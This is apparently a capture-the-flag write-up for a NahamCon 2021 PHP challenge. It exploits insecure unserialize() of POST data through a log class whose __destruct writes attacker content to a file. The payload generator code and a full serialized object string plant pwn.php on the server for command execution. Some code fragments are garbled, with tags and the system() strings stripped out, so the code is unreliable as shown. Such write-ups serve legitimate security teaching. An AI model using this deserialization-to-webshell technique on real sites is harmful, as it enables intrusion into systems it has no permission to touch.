
# Cereal and Milk

Thank you to `N1z0ku` and `NightWolf` (the author) for their hints :)

## The brief

What do you like for breakfast? Cereal and milk is my favorite.
Sometimes, it tastes a bit odd though.

## Looking at the source code

In `index.php`:
Coming soon.";
# echo print_r($output);


public function cereal_and_milk()
echo $this->cereal . " is the best cereal btw.";


$input = $_POST['serdata'];
$output = unserialize($input);

$app = new CerealAndMilk;
$app -> cereal_and_milk($output);

Our data is sent as post data, then deserialized and used as the new `CerealAndMilk` object. Alrigh, what about `log.php`:
logs , "a");
fwrite($request_log, $this->request);
fwrite($request_log, "\r\n");

the `log` has only a `__destruct()` function, which is called when an object is deserialized. What happens is, it opens the `logs` file that is provided in `append` mode and appends the `request` that was provided.

So what do we actually have to do? Create a serialized object, input that and get code execution. Don't believe me? You'll see.

## Payload

The payload may be generated using php code:
logs = "pwn.php";
$this->request = "";
$this->cereal = "Frosties";
$this->milk = "full";


$cer = new CerealAndMilk();
echo serialize($cer);
echo "\n";
But this payload doesn't work, how can we make it better? Well two things. I changed the `log.php` code and made sure for `fast deserialization` to happen, using arrays.


public function __destruct()
$request_log = fopen($this->logs , "a");
fwrite($request_log, $this->request);
fwrite($request_log, "\r\n");

And the `payload.php` code:
log[0] = new log();
$this->cereal[0] = 'Frosties';
$this->milk[0] = 'full';
$this->log[1] = new log();
$this->cereal[1] = 'Frosties';
$this->milk[1] = 'full';


$cer = new CerealAndMilk();
echo serialize($cer);
echo "\n";

And the output:
Now another quirk, do not copy the last `}`. There should be only one at the end. Now to see if it works, input it and then navigate to `/pwn.php`:


Great! That one directory looks strange, just change the `system()` command to `cat ndwbr7pVKNCrhs-CerealnMilk/flag.txt` and here we go!:

The payload `O:13:"CerealAndMilk":3:{s:3:"log";a:2:{i:0;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:59:"";}i:1;O:3:"log":2:{s:4:"logs";s:7:"pwn.php";s:7:"request";s:59:"";}}s:6:"cereal";a:2:{i:0;s:8:"Frosties";i:1;s:8:"Frosties";}s:4:"milk";a:2:{i:0;s:4:"full";i:1;s:4:"full";}`


Amazing! We have the flag :)

Original writeup (https://github.com/xnomas/Nahamcon-2021-Writeups/tree/main/cereal_and_milk).